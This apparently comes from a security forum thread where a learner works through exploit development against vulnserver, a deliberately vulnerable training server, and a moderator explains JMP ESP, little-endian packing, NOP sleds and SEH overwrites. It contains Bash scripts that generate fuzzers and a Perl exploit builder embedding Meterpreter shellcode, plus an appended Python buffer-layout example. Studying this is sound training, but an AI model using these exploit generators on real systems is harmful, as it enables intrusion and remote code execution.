Thread: Vulnserver And Ollydbg, I Need Some Help With Seh Chains

  1. #1 | Just burned his ISO | Join Date: May 2011 | Posts: 12

    Vulnserver And Ollydbg, I Need Some Help With Seh Chains

    Lately I have been learning about writing your own exploits using Steve Bradshaw's vulnserver. For those who are unfamiliar, it is a Telnet server that is purposely vulnerable to exploitation. I wrote one exploit for it, but I was hoping that someone could point me in the right direction for a couple of other exploitation methods that I am having trouble with. I will make these questions red so it's easier to find them.

    I'll start by telling you what I learned so that way there is no miscommunication.

    First off, we use SPIKE, which is a general fuzzer, to push random buffer lengths into a command. We set the command that we want to use by setting the header. Next we just make a string variable to hold our random buffer value and we are off. (PS: I also wrote a BASH script to pump out these scripts because I am lazy.)

    Code:
    #! /bin/bash
    # Writes a three-line SPIKE script that fuzzes one vulnserver command
    echo "Creates a fuzzer script for spike"
    echo "Usage: ./createfuzzscript.sh [file] [command]"
    if [ $# -ne 2 ]
    	then
    	  echo "WRONG ARGS!"
    
    else
    	touch "$1"
    	echo "s_readline();" > "$1"                     # read the server banner first
    	echo "s_string(\"$2 \");" >> "$1"               # fixed command header, e.g. "TRUN "
    	echo "s_string_variable(\"COMMAND\");" >> "$1"  # the part SPIKE mutates
    
    	cat "$1"
    
    	echo "Happy Fuzzing"
    fi
    Pretty simple so far. So next we fuzz the target command using SPIKE's generic_send_tcp program. If it crashes, it is possible that it is vulnerable to attack. We use Wireshark to trace back the packets; vulnserver tells you whether the command completed successfully or not, so we look for TCP streams that don't have that at the end. I was doing this for the TRUN command, which happens to crash around 5000 bytes.

    Now we need to write a Perl script to fuzz the target more intelligently. (I also wrote a BASH script to pump these out for me since, yet again, I am lazy.)
    Code:
    #! /bin/bash
    # Generates a Perl script that sends HEADER followed by a pattern_create.rb
    # cyclic pattern, so the bytes that land in EIP can be traced to an offset
    echo "This script will generate a Perl script used for general fuzzing"
    echo "Be nice to it, it's still in its beta stages"
    echo "USAGE: ./createplfuzz.sh [file]"
    echo " "
    echo "What do you want the header to be?"
    read header
    echo "How big should the junk size be?"
    read junksize
    echo "IP address? (Say \$ARGV[0] to make it ask)"
    read ip
    echo "Port? (Say \$ARGV[1] to make it ask)"
    read port
    
    echo "Beginning Perl Script Maker"
    
    echo '#! /usr/bin/perl' > "$1"
    echo 'use IO::Socket;' >> "$1"
    echo "\$header = \"$header\";" >> "$1"
    # non-repeating pattern of $junksize bytes (Metasploit tool, BackTrack path)
    junk=$(/pentest/exploits/framework/tools/pattern_create.rb "$junksize")
    echo "\$junk = \"$junk\";" >> "$1"
    echo '$socket = IO::Socket::INET->new(' >> "$1"
    echo 'Proto => "tcp",' >> "$1"
    echo "PeerAddr => \"$ip\"," >> "$1"
    echo "PeerPort => \"$port\"," >> "$1"
    echo ');' >> "$1"
    echo '$socket->recv($serverdata, 1024);' >> "$1"   # read the welcome banner
    echo 'print $serverdata;' >> "$1"
    echo "\$socket->send(\$header.\$junk);" >> "$1"
    
    echo "DONE!"
    cat "$1"
    chmod +x "$1"
    echo "Happy Fuzzing"
    So, basically, a quick look at what is going on: /pentest/exploits/framework/tools/pattern_create.rb $junksize runs a command that creates a traceable pattern, so if we overwrite EIP we can use this to trace EIP back and see how many bytes it took to crash it. The header is the command. Next I open OllyDbg on vulnserver and run vulnserver. Then I use my newly created fuzzing script to crash the program; I then take the value of EIP, pop it into the tracing program, and find that it is 2003 bytes in (I am still talking about the TRUN command).

    I pretty much understand everything up to this point, however I am a little fuzzy on the next part :/

    Next we write our exploit.
    Basically we just fill in that 2003-character space with junk values (for debugging purposes I just use 'A' (\x41)).
    Next we grab a JMP ESP command from a DLL it loads. The reason we do this is because most DLLs won't be compiled with ASLR or SafeSEH. Beyond that I don't have a clue why we need this. This is one question I'd love answered. Then we pack the value into little-endian format. I understand what little-endian format is, but I don't understand why we need to pack the value like that. The line is
    Code:
    $eip = pack('V', 0x625011af);   # JMP ESP address, packed as a 32-bit little-endian value
    Next we insert our shellcode (I wrote a script to just grab a Meterpreter payload and insert it here. The script is at the end of this section.)
    Next we make a NOP sled. I understand why we use it; however, the tutorial I used for this didn't explain how he arrived at the amount of NOPs he did (he used 20). How do you know how many NOPs to use for your sled? Lastly, we just send it over the wire.
    Code:
    $socket->send($header.$junk.$eip.$nop.$shellcode);
    Here is the Perl Exploit generation script.
    Code:
    #! /bin/bash
    # Generates a Perl script that sends HEADER + junk + EIP + NOP sled + shellcode
    echo "This script will generate a Perl script used for exploit dev and testing"
    echo "Be nice to it, it's still in its beta stages"
    echo "USAGE: ./createplexploit.sh [file]"
    echo " "
    echo "What do you want the header to be?"
    read header
    echo "How big should the junk size be?"
    read junksize
    echo "What is the EIP value?"
    read eip
    echo "How many NOPs should the sled contain?"
    read nop
    echo "What payload should we use?"
    read payload
    echo "What encoder should we use?"
    read encoder
    echo "What options do we want for the payload? (You should know these)"
    read ploptions
    echo "IP address? (Say \$ARGV[0] to make it ask)"
    read ip
    echo "Port? (Say \$ARGV[1] to make it ask)"
    read port
    
    echo "Beginning Perl Script Maker"
    
    echo '#! /usr/bin/perl' > "$1"
    echo 'use IO::Socket;' >> "$1"
    echo "\$header = \"$header\";" >> "$1"
    echo "\$junk = \"\\x41\" x $junksize;" >> "$1"   # 'A' bytes up to the EIP offset
    echo "\$eip = pack('V', $eip);" >> "$1"          # enter EIP as a number, e.g. 0x625011af
    echo "\$nop = \"\\x90\" x $nop;" >> "$1"
    # $ploptions is intentionally unquoted so several KEY=VALUE options split;
    # grep keeps only the quoted "\x.." lines of msfencode's Perl output
    shellcode=$(msfpayload "$payload" $ploptions EXITFUNC=seh R | msfencode -t perl -e "$encoder" | grep -e '"')
    echo "\$shellcode = $shellcode" >> "$1"
    echo '$socket = IO::Socket::INET->new(' >> "$1"
    echo 'Proto => "tcp",' >> "$1"
    echo "PeerAddr => \"$ip\"," >> "$1"
    echo "PeerPort => \"$port\"," >> "$1"
    echo ');' >> "$1"
    echo '$socket->recv($serverdata, 1024);' >> "$1"
    echo 'print $serverdata;' >> "$1"
    echo '$socket->send($header.$junk.$eip.$nop.$shellcode);' >> "$1"
    
    echo "DONE!"
    cat "$1"
    chmod +x "$1"
    echo "Happy Exploiting"
    So the exploit works fine. Next, I wanted to try to make my own; however, I hit some roadblocks. The commands I tried to use were GMON, KSTET, and GTER. All crashed when I used the SPIKE fuzzer. However, I run into the same problem with each of them: each one has an extremely small junk space (GMON was untraceable, I don't think it's overwriting EIP; KSTET only had 66 bytes; GTER only has 147 bytes). I noticed there isn't enough space for the shellcode. I first noticed it when I threw in some breakpoints (\xCC) at the beginning and end of the shellcode. It would hit the first one, but not the second. Later I just changed the shellcode in my script to \x42 x 1000, and I noticed not all of the Bs showed up. I know there are a couple of tricks to making shellcode execute from a different location, but the one I would prefer to use is overwriting the SEH chain. The SEH chain is an error-handling address that gets called when the program crashes; the SEH chain in vulnserver points to ntdll. What is the proper method for overwriting SEH and putting my shellcode in a safe place so I can execute it?

    List of questions;
    • How does the JMP ESP address from a non-ASLR DLL help us execute shellcode?
    • Why do we need to pack the EIP address in little-endian format?
    • How do we know how many NOPs to use in our sled?
    • What is the proper method for overwriting SEH and hiding our shellcode somewhere else?

  2. #2 | lupin, Super Moderator | Join Date: Jan 2010 | Posts: 2,943

    Re: Vulnserver And Ollydbg, I Need Some Help With Seh Chains

    Hi redcodefinal

    Don't know if this forum is necessarily the right place for this type of question, since it's only tangentially related to BT; however, since the mods have allowed it, I will answer for you.

    Beyond that I don't have a clue why we need this. This is one question I'd love answered.
    Why do we grab the address of a JMP ESP instruction from a DLL without ASLR and SafeSEH? Because they are exploit prevention techniques that can be bypassed by using DLLs compiled without them. Briefly, ASLR randomises the base address where DLLs are loaded, making it harder for us to predict where instructions located within that DLL will be located when our exploit runs. ASLR only applies when the operating system and the module/DLL support it (for Windows this is Vista and upwards). SafeSEH allows a module to specify a set of authorised SE handlers within that module, so that in the event of an exception only those addresses can be used to handle exceptions. This is only important on operating systems and modules that support SafeSEH (on Windows it's XP SP2 and up) and when you are writing an SEH exploit.

    I understand what Little Endian format is but, I don't understand why we need to pack the value like that.
    It needs to be packed into little-endian format because the processor reads values from the stack in little-endian format, where the most significant bytes are to the right. We need to provide the address in the format the CPU is expecting.

    How do you know how many NOPs to use for your sled?
    Guestimation/trial and error

    For stack overflows, I usually start with NOP sleds of 16 to 32 bytes in size, depending on available buffer space. For most of the Vulnserver exploits, NOP sleds are not strictly necessary; I just added them so the reader can see what they are for and how they are used.

    What is the proper method for overwriting SEH and putting my shellcode in a safe place so I can execute it?
    The SEH handler on the stack sometimes gets overwritten during a stack overflow, and if you can make this happen then an SEH exploit may be possible. Vulnserver was written specifically to allow SEH overwrites to occur only in the GMON variable (see here http://resources.infosecinstitute.com/seh-exploit/); however, it's probably not impossible that you have caused one to occur for one of the other vulnerable commands. I can tell you, however, that all of the other vulnerable functions can be exploited without the use of SEH overwrites, and that is how they will be shown in future tutorials. In a few cases you need to use those tricks you referred to for executing shellcode from another location in memory (a new tutorial on one of those methods just got posted, but the formatting is still kind of rough at the moment and I'm getting it sorted with the Infosec guys), and in others you will need to send the data in a particular format.
    Capitalisation is important. It's the difference between "Helping your brother Jack off a horse" and "Helping your brother jack off a horse".

    The Forum Rules, Forum FAQ and the BackTrack Wiki... learn them, love them, live them.
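Two steps from the thread above, the pattern_create.rb/EIP offset lookup in the first post and the pack('V') little-endian packing lupin explains in the reply, re-implemented in Python as an added example (not code from either poster, from vulnserver, or from Metasploit). It assumes the 2003-byte TRUN offset and the 0x625011af JMP ESP address quoted in the thread; the EIP value it checks is computed from the pattern itself, and the buffer is only assembled in memory, nothing is sent.

```python
import struct

def cyclic_pattern(length):
    """Same "Aa0Aa1Aa2..." sequence as Metasploit's pattern_create.rb,
    rebuilt here so an offset can be checked without the tool installed."""
    chunks = []
    for a in "ABCDEFGHIJKLMNOPQRSTUVWXYZ":
        for b in "abcdefghijklmnopqrstuvwxyz":
            for c in "0123456789":
                chunks.append(a + b + c)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length].encode("ascii")
    return "".join(chunks)[:length].encode("ascii")

def pack_address(address):
    """Python equivalent of Perl's pack('V', addr): 32-bit unsigned,
    little-endian, so the lowest byte is written first, which is the
    order the x86 CPU reads a saved return address back off the stack."""
    return struct.pack("<I", address)

def pattern_offset(pattern, eip_value):
    """Find where the four bytes now sitting in EIP came from. The debugger
    shows EIP as a little-endian number, so pack it back into bytes before
    searching. Returns -1 when EIP was not overwritten by the pattern at all
    (the 'untraceable' GMON case in the first post)."""
    return pattern.find(pack_address(eip_value))

def build_buffer(offset, jmp_esp_addr, nop_count, shellcode):
    """Layout used in the thread: junk up to EIP, the JMP ESP address packed
    little-endian, a NOP sled, then the payload. Assembled in memory only."""
    return (b"\x41" * offset + pack_address(jmp_esp_addr)
            + b"\x90" * nop_count + shellcode)

if __name__ == "__main__":
    pat = cyclic_pattern(5000)
    # Constructed EIP value: whatever pattern bytes sit at offset 2003
    eip = struct.unpack("<I", pat[2003:2007])[0]
    print(hex(eip), pattern_offset(pat, eip))   # 0x386f4337 2003
    # Placeholder payload (constructed): four int3 breakpoints, as in the post
    buf = build_buffer(2003, 0x625011af, 20, b"\xcc" * 4)
    print(len(buf), buf[2003:2007])
```

Reading the printed EIP value left to right gives 0x386f4337, yet the bytes at offset 2003 are "7Co8": that reversal is exactly why the address must be packed with 'V' before it is placed in the buffer.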
